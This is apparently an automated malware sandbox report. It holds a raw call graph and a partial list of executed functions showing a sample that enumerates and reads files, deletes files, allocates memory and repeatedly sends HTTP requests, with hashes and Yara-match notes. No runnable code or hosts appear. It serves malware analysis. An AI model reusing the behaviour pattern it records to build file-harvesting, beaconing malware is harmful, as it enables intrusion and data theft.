27970->27971 27972 29c578b 27971->27972 27973 29c5775 27971->27973 28169 29c5210 CoInitialize 27972->28169 27974 29cc870 2 API calls 27973->27974 27976 29c577f 27974->27976 27976->27885 27977 29c5799 28171 29cc580 27977->28171 27979 29c5812 27980 29cc870 2 API calls 27979->27980 27981 29c581c 27980->27981 27984 29ce310 2 API calls 27981->27984 27983 29c57b7 27983->27979 27986 29cc580 2 API calls 27983->27986 28176 29c5140 LdrLoadDll RtlFreeHeap 27983->28176 27984->27985 27985->27885 27986->27983 27988 29c23c8 27987->27988 27989 29ce3f0 2 API calls 27988->27989 27991 29c2428 27989->27991 27990 29c2431 27990->27887 27991->27990 28178 29c1800 27991->28178 27993 29c245a 27994 29c247a 27993->27994 28208 29c1b10 LdrLoadDll 27993->28208 27996 29c2498 27994->27996 28210 29c4090 12 API calls 27994->28210 28003 29c24b2 27996->28003 28212 29bb2a0 LdrLoadDll 27996->28212 27997 29c2468 27997->27994 28209 29c2120 10 API calls 27997->28209 27999 29c248c 28211 29c4090 12 API calls 27999->28211 28004 29c1800 12 API calls 28003->28004 28005 29c24df 28004->28005 28006 29c2500 28005->28006 28213 29c1b10 LdrLoadDll 28005->28213 28008 29c251e 28006->28008 28215 29c4090 12 API calls 28006->28215 28009 29c2538 28008->28009 28217 29bb2a0 LdrLoadDll 28008->28217 28014 29ce310 2 API calls 28009->28014 28010 29c24ee 28010->28006 28214 29c2120 10 API calls 28010->28214 28012 29c2512 28216 29c4090 12 API calls 28012->28216 28016 29c2542 28014->28016 28016->27887 28019 29c45b6 28018->28019 28020 29bb4a0 LdrLoadDll 28019->28020 28021 29c45e5 28020->28021 28022 29bb4a0 LdrLoadDll 28021->28022 28023 29c4611 28021->28023 28022->28023 28237 29be7d0 28023->28237 28025 29c46f5 28026 29bde82 28025->28026 28242 29c42a0 28025->28242 28028 29c5850 28026->28028 28029 29c4590 12 API calls 28028->28029 28030 29bde88 28029->28030 28031 29c32b0 28030->28031 28032 29c32d2 28031->28032 28033 29bb4a0 LdrLoadDll 28032->28033 28034 29c349d 28033->28034 28035 29bb4a0 LdrLoadDll 28034->28035 28036 29c34ae 28035->28036 28037 29bb370 LdrLoadDll 28036->28037 28038 29c34c5 28037->28038 28322 29c3170 28038->28322 28041 29c3170 13 API calls 28042 29c353b 28041->28042 28043 29c3170 13 API calls 28042->28043 28044 29c3553 28043->28044 28045 29c3170 13 API calls 28044->28045 28046 29c356b 28045->28046 28047 29c3170 13 API calls 28046->28047 28048 29c3583 28047->28048 28049 29c3170 13 API calls 28048->28049 28050 29c359e 28049->28050 28051 29c35b8 28050->28051 28052 29c3170 13 API calls 28050->28052 28051->27893 28053 29c35ec 28052->28053 28054 29c3170 13 API calls 28053->28054 28055 29c3629 28054->28055 28056 29c3170 13 API calls 28055->28056 28057 29c3666 28056->28057 28058 29c3170 13 API calls 28057->28058 28059 29c36a3 28058->28059 28060 29c3170 13 API calls 28059->28060 28061 29c36e0 28060->28061 28061->27893 28063 29c5ded 28062->28063 28064 29bb150 LdrLoadDll 28063->28064 28065 29c5e08 28064->28065 28066 29c77c0 LdrLoadDll 28065->28066 28083 29c600c 28065->28083 28067 29c5e38 28066->28067 28068 29c77c0 LdrLoadDll 28067->28068 28069 29c5e51 28068->28069 28070 29c77c0 LdrLoadDll 28069->28070 28071 29c5e6a 28070->28071 28072 29c77c0 LdrLoadDll 28071->28072 28073 29c5e86 28072->28073 28074 29c77c0 LdrLoadDll 28073->28074 28075 29c5e9f 28074->28075 28076 29c77c0 LdrLoadDll 28075->28076 28077 29c5eb8 28076->28077 28078 29c77c0 LdrLoadDll 28077->28078 28079 29c5ed4 28078->28079 28080 29c77c0 LdrLoadDll 28079->28080 28081 29c5eed 28080->28081 28082 29c77c0 LdrLoadDll 28081->28082 28084 29c5f05 28082->28084 28083->27895 28084->28083 28337 29c5990 LdrLoadDll 28084->28337 28087 29bfcf6 28086->28087 28097 29bfd01 28086->28097 28088 29ce3f0 2 API calls 28087->28088 28088->28097 28089 29bfd17 28089->27897 28090 29c77c0 LdrLoadDll 28090->28097 28091 29bfdfc GetFileAttributesW 28091->28097 28092 29bff7f 28093 29bff98 28092->28093 28094 29ce310 2 API calls 28092->28094 28093->27897 28094->28093 28096 29bb4a0 LdrLoadDll 28096->28097 28097->28089 28097->28090 28097->28091 28097->28092 28097->28096 28098 29c36f0 10 API calls 28097->28098 28338 29caa90 28097->28338 28342 29ca920 11 API calls 28097->28342 28343 29ca7c0 11 API calls 28097->28343 28098->28097 28344 29c0d00 28101->28344 28103 29c0f8d 28365 29c09e0 28103->28365 28105 29bdebe 28105->27790 28107 29bcd4c 28106->28107 28108 29cc5c0 LdrLoadDll 28107->28108 28109 29bcd65 28108->28109 28110 29bcd6c 28109->28110 28125 29cc600 28109->28125 28110->27930 28114 29bcda7 28115 29cc870 2 API calls 28114->28115 28116 29bcdca 28115->28116 28116->27930 28118 29bce05 28117->28118 28134 29cc470 28118->28134 28121->27936 28122->27943 28123->27947 28124->27938 28126 29cd3b0 LdrLoadDll 28125->28126 28127 29cc61c 28126->28127 28133 4429710 LdrInitializeThunk 28127->28133 28128 29bcd8f 28128->28110 28130 29ccbf0 28128->28130 28131 29cd3b0 LdrLoadDll 28130->28131 28132 29ccc0f 28131->28132 28132->28114 28133->28128 28135 29cd3b0 LdrLoadDll 28134->28135 28136 29cc48c 28135->28136 28139 44296d0 LdrInitializeThunk 28136->28139 28137 29bce79 28137->27937 28139->28137 28141 29c533c 28140->28141 28142 29bb150 LdrLoadDll 28141->28142 28144 29c5357 28142->28144 28143 29c5360 28143->27968 28144->28143 28145 29c77c0 LdrLoadDll 28144->28145 28146 29c537d 28145->28146 28147 29c77c0 LdrLoadDll 28146->28147 28148 29c5398 28147->28148 28149 29c77c0 LdrLoadDll 28148->28149 28150 29c53b1 28149->28150 28151 29c77c0 LdrLoadDll 28150->28151 28152 29c53cd 28151->28152 28153 29c77c0 LdrLoadDll 28152->28153 28154 29c53e6 28153->28154 28155 29c77c0 LdrLoadDll 28154->28155 28156 29c53ff 28155->28156 28157 29bb150 LdrLoadDll 28156->28157 28159 29c542b 28157->28159 28158 29c54d9 28158->27968 28159->28158 28160 29c77c0 LdrLoadDll 28159->28160 28161 29c544f 28160->28161 28162 29bb150 LdrLoadDll 28161->28162 28163 29c5484 28162->28163 28163->28158 28164 29c77c0 LdrLoadDll 28163->28164 28165 29c54a7 28164->28165 28166 29c77c0 LdrLoadDll 28165->28166 28167 29c54c0 28166->28167 28168 29c77c0 LdrLoadDll 28167->28168 28168->28158 28170 29c5275 28169->28170 28170->27977 28172 29cd3b0 LdrLoadDll 28171->28172 28173 29cc59c 28172->28173 28177 4429610 LdrInitializeThunk 28173->28177 28174 29cc5bb 28174->27983 28176->27983 28177->28174 28179 29c1898 28178->28179 28180 29bb4a0 LdrLoadDll 28179->28180 28181 29c1936 28180->28181 28182 29bb4a0 LdrLoadDll 28181->28182 28183 29c1951 28182->28183 28184 29bcde0 2 API calls 28183->28184 28185 29c1976 28184->28185 28186 29c1abd 28185->28186 28230 29cc500 28185->28230 28188 29c1ace 28186->28188 28218 29c11c0 28186->28218 28188->27993 28191 29c1ab3 28192 29cc870 2 API calls 28191->28192 28192->28186 28193 29c19af 28194 29cc870 2 API calls 28193->28194 28195 29c19e9 28194->28195 28235 29ce4d0 LdrLoadDll 28195->28235 28197 29c1a1f 28197->28188 28198 29bcde0 2 API calls 28197->28198 28199 29c1a45 28198->28199 28199->28188 28200 29cc500 2 API calls 28199->28200 28201 29c1a6a 28200->28201 28202 29c1a9d 28201->28202 28203 29c1a71 28201->28203 28205 29cc870 2 API calls 28202->28205 28204 29cc870 2 API calls 28203->28204 28206 29c1a7b 28204->28206 28207 29c1aa7 28205->28207 28206->27993 28207->27993 28208->27997 28209->27994 28210->27999 28211->27996 28212->28003 28213->28010 28214->28006 28215->28012 28216->28008 28217->28009 28219 29c11e5 28218->28219 28220 29bb4a0 LdrLoadDll 28219->28220 28221 29c12a0 28220->28221 28222 29bb4a0 LdrLoadDll 28221->28222 28223 29c12c4 28222->28223 28224 29c73b0 10 API calls 28223->28224 28225 29c1317 28224->28225 28226 29bb4a0 LdrLoadDll 28225->28226 28229 29c13d1 28225->28229 28227 29c137e 28226->28227 28228 29c73b0 10 API calls 28227->28228 28228->28229 28229->28188 28231 29cd3b0 LdrLoadDll 28230->28231 28232 29cc51c 28231->28232 28236 4429650 LdrInitializeThunk 28232->28236 28233 29c19a4 28233->28191 28233->28193 28235->28197 28236->28233 28238 29c77c0 LdrLoadDll 28237->28238 28239 29be7ef 28238->28239 28240 29be801 28239->28240 28241 29be7f6 GetFileAttributesW 28239->28241 28240->28025 28241->28240 28245 29c42b6 28242->28245 28266 29cabf0 28242->28266 28244 29c430b 28244->28025 28245->28244 28246 29c42d5 28245->28246 28247 29c4317 28245->28247 28249 29c42dd 28246->28249 28250 29c42fa 28246->28250 28248 29bb4a0 LdrLoadDll 28247->28248 28251 29c4328 28248->28251 28253 29ce310 2 API calls 28249->28253 28252 29ce310 2 API calls 28250->28252 28255 29c73b0 10 API calls 28251->28255 28252->28244 28254 29c42ee 28253->28254 28254->28025 28256 29c433f 28255->28256 28306 29c36f0 28256->28306 28258 29c434a 28262 29c4448 28258->28262 28263 29c4362 28258->28263 28259 29c442f 28260 29ce310 2 API calls 28259->28260 28261 29c4553 28260->28261 28261->28025 28262->28259 28317 29c3c80 11 API calls 28262->28317 28263->28259 28316 29c3c80 11 API calls 28263->28316 28267 29cabfe 28266->28267 28268 29cac05 28266->28268 28267->28245 28269 29bb150 LdrLoadDll 28268->28269 28270 29cac37 28269->28270 28271 29cac46 28270->28271 28318 29ca6e0 LdrLoadDll 28270->28318 28273 29ce3f0 2 API calls 28271->28273 28275 29cae29 28271->28275 28274 29cac5f 28273->28274 28274->28275 28276 29cadd8 28274->28276 28277 29cac74 28274->28277 28275->28245 28278 29cae7b 28276->28278 28279 29cade2 28276->28279 28319 29c37d0 LdrLoadDll 28277->28319 28281 29ce310 2 API calls 28278->28281 28320 29c37d0 LdrLoadDll 28279->28320 28281->28275 28283 29cac8b 28286 29c77c0 LdrLoadDll 28283->28286 28284 29cadf9 28321 29ca010 LdrLoadDll 28284->28321 28288 29caca7 28286->28288 28287 29cae0f 28289 29c77c0 LdrLoadDll 28287->28289 28290 29c77c0 LdrLoadDll 28288->28290 28289->28275 28291 29cacc3 28290->28291 28292 29c77c0 LdrLoadDll 28291->28292 28293 29cace2 28292->28293 28294 29c77c0 LdrLoadDll 28293->28294 28295 29cacfe 28294->28295 28296 29c77c0 LdrLoadDll 28295->28296 28297 29cad1a 28296->28297 28298 29c77c0 LdrLoadDll 28297->28298 28299 29cad39 28298->28299 28300 29c77c0 LdrLoadDll 28299->28300 28301 29cad55 28300->28301 28302 29c77c0 LdrLoadDll 28301->28302 28305 29cad78 28302->28305 28303 29ce310 2 API calls 28304 29cadcc 28303->28304 28304->28245 28305->28275 28305->28303 28307 29c73b0 10 API calls 28306->28307 28308 29c3706 28307->28308 28309 29c3713 28308->28309 28310 29c73b0 10 API calls 28308->28310 28309->28258 28311 29c3724 28310->28311 28311->28309 28312 29c73b0 10 API calls 28311->28312 28313 29c373f 28312->28313 28314 29ce310 2 API calls 28313->28314 28315 29c374c 28314->28315 28315->28258 28316->28263 28317->28262 28318->28271 28319->28283 28320->28284 28321->28287 28323 29c3199 28322->28323 28324 29c77c0 LdrLoadDll 28323->28324 28325 29c31d6 28324->28325 28326 29c77c0 LdrLoadDll 28325->28326 28327 29c31f4 28326->28327 28328 29c77c0 LdrLoadDll 28327->28328 28330 29c3216 28328->28330 28329 29c329c 28329->28041 28330->28329 28331 29c3240 FindFirstFileW 28330->28331 28331->28329 28335 29c325b 28331->28335 28332 29c3283 FindNextFileW 28334 29c3295 FindClose 28332->28334 28332->28335 28334->28329 28335->28332 28336 29c3050 13 API calls 28335->28336 28336->28335 28337->28084 28339 29caaa6 28338->28339 28341 29caba6 28338->28341 28340 29c73b0 10 API calls 28339->28340 28339->28341 28340->28339 28341->28097 28342->28097 28343->28097 28345 29c0d25 28344->28345 28346 29bb4a0 LdrLoadDll 28345->28346 28347 29c0d8a 28346->28347 28348 29bb4a0 LdrLoadDll 28347->28348 28349 29c0dd8 28348->28349 28350 29be7d0 2 API calls 28349->28350 28351 29c0e1f 28350->28351 28352 29c0e26 28351->28352 28353 29cabf0 3 API calls 28351->28353 28352->28103 28355 29c0e34 28353->28355 28354 29c0e3d 28354->28103 28355->28354 28356 29bb4a0 LdrLoadDll 28355->28356 28358 29c0e8c 28356->28358 28357 29caa90 10 API calls 28357->28358 28358->28357 28360 29c0f11 28358->28360 28378 29c0440 28358->28378 28362 29c0f69 28360->28362 28389 29c07a0 28360->28389 28363 29ce310 2 API calls 28362->28363 28364 29c0f70 28363->28364 28364->28103 28366 29c09f6 28365->28366 28374 29c0a01 28365->28374 28367 29ce3f0 2 API calls 28366->28367 28367->28374 28368 29c0a17 28368->28105 28369 29be7d0 2 API calls 28369->28374 28370 29c0cd0 28371 29c0ce9 28370->28371 28372 29ce310 2 API calls 28370->28372 28371->28105 28372->28371 28373 29caa90 10 API calls 28373->28374 28374->28368 28374->28369 28374->28370 28374->28373 28375 29c0440 11 API calls 28374->28375 28376 29bb4a0 LdrLoadDll 28374->28376 28377 29c07a0 10 API calls 28374->28377 28375->28374 28376->28374 28377->28374 28379 29c0466 28378->28379 28380 29c73b0 10 API calls 28379->28380 28381 29c04c2 28380->28381 28382 29c36f0 10 API calls 28381->28382 28383 29c04cd 28382->28383 28385 29c0650 28383->28385 28386 29c04eb 28383->28386 28384 29c0635 28384->28358 28385->28384 28396 29c0310 11 API calls 28385->28396 28386->28384 28395 29c0310 11 API calls 28386->28395 28390 29c07c6 28389->28390 28391 29c73b0 10 API calls 28390->28391 28392 29c0837 28391->28392 28393 29c36f0 10 API calls 28392->28393 28394 29c0842 28393->28394 28394->28360 28395->28386 28396->28385 28397->27905 28398->27916 28399->27914 28400->27908 28403 4429540 LdrInitializeThunk 28405 29bec0d 28406 29c73b0 10 API calls 28405->28406 28407 29bebcf 28406->28407 28408 29b7dd0 28409 29b7de6 28408->28409 28414 29b7f71 28409->28414 28418 29b79a0 10 API calls 28409->28418 28411 29b7ee5 28411->28414 28419 29b7ba0 11 API calls 28411->28419 28413 29b7f13 28413->28414 28415 29cc2e0 2 API calls 28413->28415 28416 29b7f48 28415->28416 28416->28414 28420 29cc8e0 LdrLoadDll 28416->28420 28418->28411 28419->28413 28420->28414 28421 29b9710 28422 29b9735 28421->28422 28423 29bb150 LdrLoadDll 28422->28423 28424 29b9768 28423->28424 28425 29bcd20 3 API calls 28424->28425 28426 29b978d 28424->28426 28425->28426 28427 29cb490 28428 29ce290 2 API calls 28427->28428 28430 29cb4cb 28428->28430 28429 29cb5c6 28430->28429 28431 29bb150 LdrLoadDll 28430->28431 28432 29cb50b 28431->28432 28433 29c77c0 LdrLoadDll 28432->28433 28435 29cb530 28433->28435 28434 29cb540 Sleep 28434->28435 28435->28429 28435->28434 28438 29cb120 28435->28438 28460 29cb2f0 LdrLoadDll InternetOpenA InternetConnectA HttpSendRequestA 28435->28460 28439 29cb145 28438->28439 28440 29cb193 28439->28440 28461 29ccd80 28439->28461 28442 29cb2d7 28440->28442 28466 29ccdf0 28440->28466 28442->28435 28444 29cb1cc 28444->28442 28471 29cce70 28444->28471 28447 29cb214 28474 29ccef0 28447->28474 28448 29cb200 28479 29ccfd0 LdrLoadDll 28448->28479 28451 29cb20a 28451->28435 28452 29cb2b5 28482 29ccfd0 LdrLoadDll 28452->28482 28454 29cb2cd 28483 29ccfd0 LdrLoadDll 28454->28483 28455 29cb223 28455->28452 28480 29ccf60 LdrLoadDll 28455->28480 28458 29cb277 28458->28452 28481 29ccf60 LdrLoadDll 28458->28481 28460->28435 28484 29cd4c0 28461->28484 28464 29ccdc6 InternetOpenA 28464->28440 28465 29ccde1 28465->28440 28467 29cd4c0 LdrLoadDll 28466->28467 28468 29cce32 28467->28468 28469 29cce3b InternetConnectA 28468->28469 28470 29cce62 28468->28470 28469->28444 28470->28444 28472 29cd4c0 LdrLoadDll 28471->28472 28473 29cb1f7 28472->28473 28473->28447 28473->28448 28475 29cd4c0 LdrLoadDll 28474->28475 28476 29ccf32 28475->28476 28477 29ccf3b HttpSendRequestA 28476->28477 28478 29ccf56 28476->28478 28477->28455 28478->28455 28479->28451 28480->28458 28481->28458 28482->28454 28483->28442 28485 29ccdbd 28484->28485 28486 29cd4cc 28484->28486 28485->28464 28485->28465 28487 29c77c0 LdrLoadDll 28486->28487 28487->28485

                                                                                                Executed Functions

                                                                                                Function 029C3169 Relevance: 4.6, APIs: 3, Instructions: 109fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,00000000), ref: 029C3251
                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 029C328E
                                                                                                • FindClose.KERNEL32(?), ref: 029C3299
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                • String ID:
                                                                                                • API String ID: 3541575487-0
                                                                                                • Opcode ID: 2d7346cc41543868fcf6bd371865c5ddf1c2e019ec400afa5bd956883b665ff5
                                                                                                • Instruction ID: 6d17dece2673dc58f2832164cb3d239150134047eb75e5d6804df5afb5cacb72
                                                                                                • Opcode Fuzzy Hash: 2d7346cc41543868fcf6bd371865c5ddf1c2e019ec400afa5bd956883b665ff5
                                                                                                • Instruction Fuzzy Hash: 413187B1900358BBEB20EBA4CC85FEF777D9F84705F24459CB909A6180D770AA44CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029C3170 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,00000000), ref: 029C3251
                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 029C328E
                                                                                                • FindClose.KERNEL32(?), ref: 029C3299
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                • String ID:
                                                                                                • API String ID: 3541575487-0
                                                                                                • Opcode ID: 0ba7c06a3d22448f4e44dd99f3549b6687fd0b34a8dc64e80039fe5e6ab4fd6f
                                                                                                • Instruction ID: fa5ecc8eb332f248639af5d2306e7b0dcea32e8731d1bff8f8de6426aa5250e5
                                                                                                • Opcode Fuzzy Hash: 0ba7c06a3d22448f4e44dd99f3549b6687fd0b34a8dc64e80039fe5e6ab4fd6f
                                                                                                • Instruction Fuzzy Hash: B43165B1900358BBEB20DBA4CC85FEF777D9F84704F24459CB909A6180DA70AA44CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CC740 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,029C751C,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,029C751C,?,00000000,00000060,00000000,00000000), ref: 029CC78D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                • Instruction ID: e5ecf8a05f671cc0df556ee2dff4b6c066d50cadafdb3625574011409ab23975
                                                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                • Instruction Fuzzy Hash: ABF0BDB2200208ABCB08CF88DC84EEB37ADAF8C754F118208BA0997240C630E8118BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CC73A Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,029C751C,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,029C751C,?,00000000,00000060,00000000,00000000), ref: 029CC78D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 43381a32086bcd858c5085b4cf6c4b5daac60857a517dfd83ae07a6e5f6c6041
                                                                                                • Instruction ID: e503239d4e29ed706756ecde6b413fb9ddb870abd27db260d57cff1f348853da
                                                                                                • Opcode Fuzzy Hash: 43381a32086bcd858c5085b4cf6c4b5daac60857a517dfd83ae07a6e5f6c6041
                                                                                                • Instruction Fuzzy Hash: 36F037B2210109ABCB08CF98DC84CEB77EDEF8C714B14824CFA4D93202D234E8518BA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CC7F0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtReadFile.NTDLL(029C76E0,029C2BBA,FFFFFFFF,029C71CA,00000002,?,029C76E0,00000002,029C71CA,FFFFFFFF,029C2BBA,029C76E0,00000002,00000000), ref: 029CC835
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                • Instruction ID: 247450dde5f08cdf0e3978bd3e4f59772c226a4e5c3dcf360cdbd06e6d1e5d45
                                                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                • Instruction Fuzzy Hash: 7DF0AFB2200208ABCB14DF99DC84EEB77ADAF8C754F118258BA0DA7241D630E8118BA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CC7EA Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtReadFile.NTDLL(029C76E0,029C2BBA,FFFFFFFF,029C71CA,00000002,?,029C76E0,00000002,029C71CA,FFFFFFFF,029C2BBA,029C76E0,00000002,00000000), ref: 029CC835
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: 0a6187b55f2dd30eb2c4bf58fbecfebaf44e384a3cee75de19268cf0da9f8d38
                                                                                                • Instruction ID: a88138a37c54683916064c1e20d18dfc44c42201d00d43c753ae47cf98eb7ebf
                                                                                                • Opcode Fuzzy Hash: 0a6187b55f2dd30eb2c4bf58fbecfebaf44e384a3cee75de19268cf0da9f8d38
                                                                                                • Instruction Fuzzy Hash: B6F0F4B2200108ABCB14DF99DC84EEB37A9EF8C354F118648BE0DA7240C630E811CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CC91C Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,029B17C4,00000004,00001000,00000000), ref: 029CC959
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2167126740-0
                                                                                                • Opcode ID: e42569d5e266fa0705db429bd7afe7a3aeb51538aa5f65603f5a944f9f6562d5
                                                                                                • Instruction ID: 3835b5cc46726e038deb37f105be17a38f7f631ce436c3dc97458834ef74a6a4
                                                                                                • Opcode Fuzzy Hash: e42569d5e266fa0705db429bd7afe7a3aeb51538aa5f65603f5a944f9f6562d5
                                                                                                • Instruction Fuzzy Hash: A7F01CB2200105AFCB14DF89DC80EDB77A9AF8C754F118219BA0997381C634E911CBB0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CC920 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,029B17C4,00000004,00001000,00000000), ref: 029CC959
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2167126740-0
                                                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                • Instruction ID: c5fd20cff4d737d63a1ad8e2d9a1fb3e279963650ddb891e2454fe6f7501228b
                                                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                • Instruction Fuzzy Hash: 0EF015B2200208ABCB14DF89DC80EAB77ADAF88754F118118BE0997241C630F810CBF5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CC83D Relevance: 1.5, APIs: 1, Instructions: 23filenativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtDeleteFile.NTDLL(029C74E2,00000002,?,029C74E2,00000000,00000018,?,?,74511176,00000000,?), ref: 029CC865
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteFile
                                                                                                • String ID:
                                                                                                • API String ID: 4033686569-0
                                                                                                • Opcode ID: abbae6e71b1b9e8b48e26b77e87c40fd3b4c392d11aa1dfc2ea8c9730f696be5
                                                                                                • Instruction ID: 14eb83f6b4a3c240a4d8957e553cca46f4d7e8d25c89f3f189f4699f114e93fd
                                                                                                • Opcode Fuzzy Hash: abbae6e71b1b9e8b48e26b77e87c40fd3b4c392d11aa1dfc2ea8c9730f696be5
                                                                                                • Instruction Fuzzy Hash: DBE086322043107FC710DB94DC85EC77B98DF45324F144899BA5D5B681C634F500C7E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CC840 Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtDeleteFile.NTDLL(029C74E2,00000002,?,029C74E2,00000000,00000018,?,?,74511176,00000000,?), ref: 029CC865
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteFile
                                                                                                • String ID:
                                                                                                • API String ID: 4033686569-0
                                                                                                • Opcode ID: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                                                • Instruction ID: c7ad10f793f42b93e81652d9e673c1fa8ba50fd2f104da3088ff735baddc9905
